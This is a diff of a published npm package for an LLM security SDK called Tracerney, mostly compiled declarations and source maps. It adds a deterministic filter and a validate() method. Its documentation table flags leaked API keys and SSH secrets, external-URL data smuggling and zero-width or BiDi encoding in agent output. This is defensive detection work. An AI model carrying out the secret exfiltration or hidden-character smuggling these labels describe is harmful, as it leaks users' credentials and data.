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"}

package/dist/domain/pii/index.d.ts

@@ -0,0 +1,9 @@
+/**
+ * Domain / PII
+ * Barrel export for Layer 1 Deterministic Filter
+ */
+export { DeterministicFilter } from "./DeterministicFilter";
+export type { SuspiciousTrace, PIIFinding, FilterOutcome, SuspiciousLabel } from "./DeterministicFilter";
+export { PII_PATTERNS, CATEGORY_TO_LABEL, LABEL_PRIORITY } from "./PIIPattern";
+export type { PIIPattern, PIICategory } from "./PIIPattern";
+//# sourceMappingURL=index.d.ts.map

package/dist/domain/pii/index.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../../../src/domain/pii/index.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,OAAO,EAAE,mBAAmB,EAAE,MAAM,uBAAuB,CAAC;AAC5D,YAAY,EAAE,eAAe,EAAE,UAAU,EAAE,aAAa,EAAE,eAAe,EAAE,MAAM,uBAAuB,CAAC;AAEzG,OAAO,EAAE,YAAY,EAAE,iBAAiB,EAAE,cAAc,EAAE,MAAM,cAAc,CAAC;AAC/E,YAAY,EAAE,UAAU,EAAE,WAAW,EAAE,MAAM,cAAc,CAAC"}

package/dist/domain/pii/index.js

@@ -0,0 +1,7 @@
+/**
+ * Domain / PII
+ * Barrel export for Layer 1 Deterministic Filter
+ */
+export { DeterministicFilter } from './DeterministicFilter.js';
+export { PII_PATTERNS, CATEGORY_TO_LABEL, LABEL_PRIORITY } from './PIIPattern.js';
+//# sourceMappingURL=index.js.map

package/dist/domain/pii/index.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../../../src/domain/pii/index.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,OAAO,EAAE,mBAAmB,EAAE,MAAM,uBAAuB,CAAC;AAG5D,OAAO,EAAE,YAAY,EAAE,iBAAiB,EAAE,cAAc,EAAE,MAAM,cAAc,CAAC"}

package/dist/index.d.ts

@@ -17,6 +17,7 @@
  * ```
  */
 import { type WrapOptions, type ServiceStatus, type ScanResult } from "./application";
+import { type SuspiciousTrace } from "./domain/pii/DeterministicFilter";
 import { ShieldBlockError } from "./application/ShieldBlockError";
 import { type LLMResponse } from "./application/ports/ILLMProvider";
 /**
@@ -134,6 +135,39 @@ export declare class Tracerney {
      * ```
      */
     scanPrompt(prompt: string): Promise<ScanResult>;
+    /**
+     * Layer 1: Scan any string (agent output, tool result, raw text) for suspicious content.
+     *
+     * The SDK is a high-precision sensor — it never decides for you.
+     * Every match is returned as a SuspiciousTrace with a label and pre-computed redactedContent.
+     * You choose the reaction.
+     *
+     * **The Suspicious Manifest:**
+     * | Label                  | Trigger              | Recommended Action |
+     * |------------------------|----------------------|--------------------|
+     * | `SUSPICIOUS_PII`       | Email / Phone        | Usually Redact     |
+     * | `SUSPICIOUS_SECRET`    | API keys / SSH       | Usually Block      |
+     * | `SUSPICIOUS_EGRESS`    | External URL smuggle | Always Block       |
+     * | `SUSPICIOUS_ENCODING`  | Zero-width / BiDi    | Audit / Block      |
+     *
+     * @example
+     * ```typescript
+     * const trace = tracerney.validate(agentOutput);
+     *
+     * if (trace.isSuspicious) {
+     *   console.log(`Alert [${trace.label}]: ${trace.reason}`);
+     *
+     *   // Option A: Hard block
+     *   if (trace.label === 'SUSPICIOUS_EGRESS') {
+     *     throw new Error('Security Policy Violation');
+     *   }
+     *
+     *   // Option B: Surgical scrub
+     *   return trace.redactedContent;
+     * }
+     * ```
+     */
+    validate(text: string): SuspiciousTrace;
     /**
      * Update allowed tools at runtime
      *
@@ -161,6 +195,10 @@ export type { RemotePatternRepositoryConfig } from "./infrastructure/patterns";
 export { normalizePrompt, normalizePrompts, jitter } from "./application/utils";
 export { HttpSignalSink } from "./infrastructure/telemetry";
 export type { HttpSignalSinkConfig } from "./infrastructure/telemetry";
+export { DeterministicFilter } from "./domain/pii/DeterministicFilter";
+export type { SuspiciousTrace, FilterOutcome, PIIFinding, SuspiciousLabel } from "./domain/pii/DeterministicFilter";
+export { PII_PATTERNS } from "./domain/pii/PIIPattern";
+export type { PIIPattern, PIICategory } from "./domain/pii/PIIPattern";
 export { LLMSentinel } from "./infrastructure/sentinel/LLMSentinel";
 export type { LLMSentinelOptions } from "./infrastructure/sentinel/LLMSentinel";
 export { HttpShadowLogSink } from "./infrastructure/telemetry/HttpShadowLogSink";

package/dist/index.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"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"}

package/dist/index.js

@@ -133,6 +133,41 @@ export class Tracerney {
     async scanPrompt(prompt) {
         return this.service.scanPrompt(prompt);
     }
+    /**
+     * Layer 1: Scan any string (agent output, tool result, raw text) for suspicious content.
+     *
+     * The SDK is a high-precision sensor — it never decides for you.
+     * Every match is returned as a SuspiciousTrace with a label and pre-computed redactedContent.
+     * You choose the reaction.
+     *
+     * **The Suspicious Manifest:**
+     * | Label                  | Trigger              | Recommended Action |
+     * |------------------------|----------------------|--------------------|
+     * | `SUSPICIOUS_PII`       | Email / Phone        | Usually Redact     |
+     * | `SUSPICIOUS_SECRET`    | API keys / SSH       | Usually Block      |
+     * | `SUSPICIOUS_EGRESS`    | External URL smuggle | Always Block       |
+     * | `SUSPICIOUS_ENCODING`  | Zero-width / BiDi    | Audit / Block      |
+     *
+     * @example
+     * ```typescript
+     * const trace = tracerney.validate(agentOutput);
+     *
+     * if (trace.isSuspicious) {
+     *   console.log(`Alert [${trace.label}]: ${trace.reason}`);
+     *
+     *   // Option A: Hard block
+     *   if (trace.label === 'SUSPICIOUS_EGRESS') {
+     *     throw new Error('Security Policy Violation');
+     *   }
+     *
+     *   // Option B: Surgical scrub
+     *   return trace.redactedContent;
+     * }
+     * ```
+     */
+    validate(text) {
+        return this.service.validate(text);
+    }
     /**
      * Update allowed tools at runtime
      *
@@ -165,6 +200,9 @@ export { BundledPatternRepository, RemotePatternRepository } from './infrastruct
 // Utility exports (for middleware & advanced use)
 export { normalizePrompt, normalizePrompts, jitter } from './application/utils/index.js';
 export { HttpSignalSink } from './infrastructure/telemetry/index.js';
+// Layer 1 Deterministic Filter exports
+export { DeterministicFilter } from './domain/pii/DeterministicFilter.js';
+export { PII_PATTERNS } from './domain/pii/PIIPattern.js';
 // Layer 2 Sentinel exports
 export { LLMSentinel } from './infrastructure/sentinel/LLMSentinel.js';
 export { HttpShadowLogSink } from './infrastructure/telemetry/HttpShadowLogSink.js';

package/dist/index.js.map

@@ -1 +1 @@
-{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"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